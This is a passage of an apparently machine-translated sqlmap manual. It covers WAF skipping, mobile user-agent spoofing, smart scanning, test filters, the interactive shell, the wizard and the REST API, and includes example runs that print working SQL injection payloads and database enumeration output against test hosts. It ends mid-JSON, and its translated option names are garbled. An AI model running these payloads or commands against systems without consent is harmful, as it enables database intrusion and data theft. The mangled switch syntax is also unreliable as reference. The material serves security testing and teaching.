[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application S
ecurity (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firew
all (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Appli
cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
-tamper')
[...]

Skip heuristic detection WAF/IPS/IDS protection

Switch: - skip WAF

By default, sqlmap automatically sends a false parameter value in a startup request, which contains an intentional "suspicious" SQL injection payload (for example:... & foobar = and 1 = 1 union all select 1,2,3, table_name from information_schema.tables where 2 > 1). If the target response is different from the original request response, it is likely that there is a protection mechanism. If there are any problems, the user can use the switch -- skip WAF to disable this mechanism.

Camouflage Smartphone

Switch: - mobile

Sometimes the Web server provides a different interface from the computer to the mobile phone. In this case, you can force the predefined smartphone HTTP user agent header value. Using this switch, sqlmap will ask you to choose a popular smartphone, which will be disguised in the current operation.

Running example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Offline working mode (using session data only)

Switch: - offline

Using the switch -- offline, sqlmap will only use the data of the previous session in the data enumeration. This basically means that zero connection attempts are made during such operation.

Safely delete everything in the output directory

Switch: - purge output

If the user decides to safely delete all contents in the output directory, including all target details that sqlmap has run before, the switch -- purge output can be used. During clearing, all files in the (subdirectories) in the output directory will be overwritten, truncated and renamed to random names by random data, and the (subdirectories) will also be renamed to random names. Finally, the whole directory tree will be deleted.

Running example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]

Thorough testing is only performed when heuristic detection is used

Switch: - smart

In some cases, the user has a large list of potential target URL s (for example, use option - m) and wants to find vulnerable targets as soon as possible. If the switch smart is used, only the parameters that can cause DBMS errors will be used in further scans. Otherwise it will be skipped.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
r=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might 
not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
t not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable 
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
[...]

Select (or skip) tests based on payloads and / or titles

Options: - test filter

Use this option if you want to filter tests based on payloads and / or titles. For example, to test all payloads that contain the ROW keyword, use -- test filter = ROW.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
atch --test-filter=ROW
[...]
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
 HAVING clause' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
T (C
    ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
M (S
    ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY 
x)
---
[...]

Options: - Test skip = Test

Use this option if you want to skip tests based on payloads and / or titles. For example, if you want to skip payloads that contain the BENCHMARK keyword, you can use -- Test skip = BENCHMARK.

Interactive sqlmap shell

Switch: -- sqlmap shell

Using the switch - sqlmap shell, the user can see the interactive sqlmap shell, which has all previous running history, including used options and / or switches:

$ python sqlmap.py --sqlmap-shell
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
BEU --batch
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:11

[xx:xx:11] [INFO] testing connection to the target URL
[xx:xx:12] [INFO] testing if the target URL is stable
[xx:xx:13] [INFO] target URL is stable
[xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
 be injectable (possible DBMS: 'MySQL')
[xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending 
provided level (1) and risk (1) values? [Y/n] Y
[xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - 
WHERE or HAVING clause' injectable 
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT 
UNSIGNED)'
[xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:15] [INFO] target URL appears to have 3 columns in query
[xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
quests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:16] [INFO] testing MySQL
[xx:xx:16] [INFO] confirming MySQL
[xx:xx:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com'
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:25

[xx:xx:26] [INFO] resuming back-end DBMS 'mysql' 
[xx:xx:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:26] [INFO] the back-end DBMS is MySQL
[xx:xx:26] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.1.73-0ubuntu0.10.04.1'
[xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com' 
sqlmap-shell> exit

Wizard interface suitable for beginners

Switch: - wizard

Sqlmap provides a wizard interface for beginners, which uses a simple workflow with as few problems as possible. If the user enters the target URL and uses the default setting (for example, press Enter), the sqlmap running environment should be set correctly at the end of the workflow.

Example for Microsoft SQL Server target:

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in
t.asp?id=1
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C
HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58
)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1
00)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+
CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT 
(CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR
(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
    Oct 14 2005 00:33:37 
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at xx:xx:52

API(REST-JSON)

Sqlmap can be run through the REST JSON API, that is, it uses the REST (abbreviation of REpresentational State Transfer) style API in JSON format to communicate between server and client instances. To put it bluntly, the server uses sqlmap for scanning, while the client sets sqlmap options / switches and pulls the results back. The main program file used to run the API is sqlmapapi Py, and the client can be implemented in any user program.

$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")

Run sqlmapapi by using the switch - s Py enable the server and use the switch - c to enable the client. In both cases, the user can (optionally) use the option - H (the default is "127.0.0.1") and the option - p (the default is 8775) to set the IP address and port for listening. The "session" of each client can have multiple "tasks" (for example, running sqlmap scanning). Users can arbitrarily select a task to be in the current active state.

The commands available in the client command line interface are:

• Help -- displays a list of available commands and basic help information
• new ARGS -- start a new scanning task with the provided parameters (for example: New - U)“ http://testphp.vulnweb.com/artists.php?artist=1 ")
• use TASKID -- switch the current context to different tasks (for example: use c04d8c5c7582efb4)
• Data -- get and display the data of the current task
• Log - get and display the current task log
• Status -- get and display the current task status
• Stop -- stop the current task
• Kill -- kill the current task
• list -- displays all tasks (current session)
• flush -- clear all tasks (for example: deletes)
• Exit -- exit the client interface

Example of running a server:

$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages

Example of running a client:

$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9
]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp
hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st
art
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'..
.
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api> ?
help        Show this help message
new ARGS    Start a new scan task with provided arguments (e.g. 'new -u "http://
testphp.vulnweb.com/artists.php?artist=1"')
use TASKID  Switch current context to different task (e.g. 'use c04d8c5c7582efb4
')
data        Retrieve and show data for current task
log         Retrieve and show log for current task
status      Retrieve and show status for current task
stop        Stop current task
kill        Kill current task
list        Display all tasks
flush       Flush tasks (delete all tasks)
exit        Exit this client
api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s
ession
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)> status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "running",
    "returncode": null,
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "terminated",
    "returncode": 0,
    "success": true
}
api (a42ddaef02e976f0)> log
[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
{
    "log": [
        {
            "message": "flushing session file",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing connection to the target URL",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "checking if the target is protected by some kind of WAF/
IPS/IDS",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing if the target URL is stable",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "target URL is stable",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing if GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "confirming that GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "heuristic (basic) test shows that GET parameter 'artist'
 might be injectable (possible DBMS: 'MySQL')",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing for SQL injection on GET parameter 'artist'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING claus
e'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' appears to be 'AND boolean-based
blind - WHERE or HAVING clause' injectable (with --string=\"hac\")",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING,
 ORDER BY or GROUP BY clause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING c
lause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING cla
use (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL OR error-based - WHERE or HAVING clause (
FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (E
XTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (B
IGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (E
XP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace
(JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 error-based - Parameter replace (F
LOOR)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (U
PDATEXML)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (E
XTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL inline queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (comment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - c
omment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - c
omment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.0.12 AND time-based blind'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AN
D time-based blind' injectable ",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "automatically extending ranges for UNION query injection
 technique tests as there is at least one other (potential) technique found",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "'ORDER BY' technique appears to be usable. This should r
educe the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "target URL appears to have 3 columns in query",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "the back-end DBMS is MySQL",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "fetching banner",
            "level": "INFO",
            "time": "12:48:24"
        }
    ],
    "success": true
}
api (a42ddaef02e976f0)> data
[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
{
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": [
                {
                    "dbms": "MySQL",
                    "suffix": "",
                    "clause": [
                        1,
                        9
                    ],
                    "notes": [],
                    "ptype": 1,
                    "dbms_version": [
                        ">= 5.0.12"
                    ],
                    "prefix": "",
                    "place": "GET",
                    "os": null,
                    "conf": {
                        "code": null,
                        "string": "hac",
                        "notString": null,
                        "titles": false,
                        "regexp": null,
                        "textOnly": false,
                        "optimize": false
                    },
                    "parameter": "artist",
                    "data": {
                        "1": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "AND boolean-based blind - WHERE or HAVING
clause",
                            "templatePayload": null,
                            "vector": "AND [INFERENCE]",
                            "falseCode": 200,
                            "where": 1,
                            "payload": "artist=1 AND 2794=2794"
                        },
                        "5": {
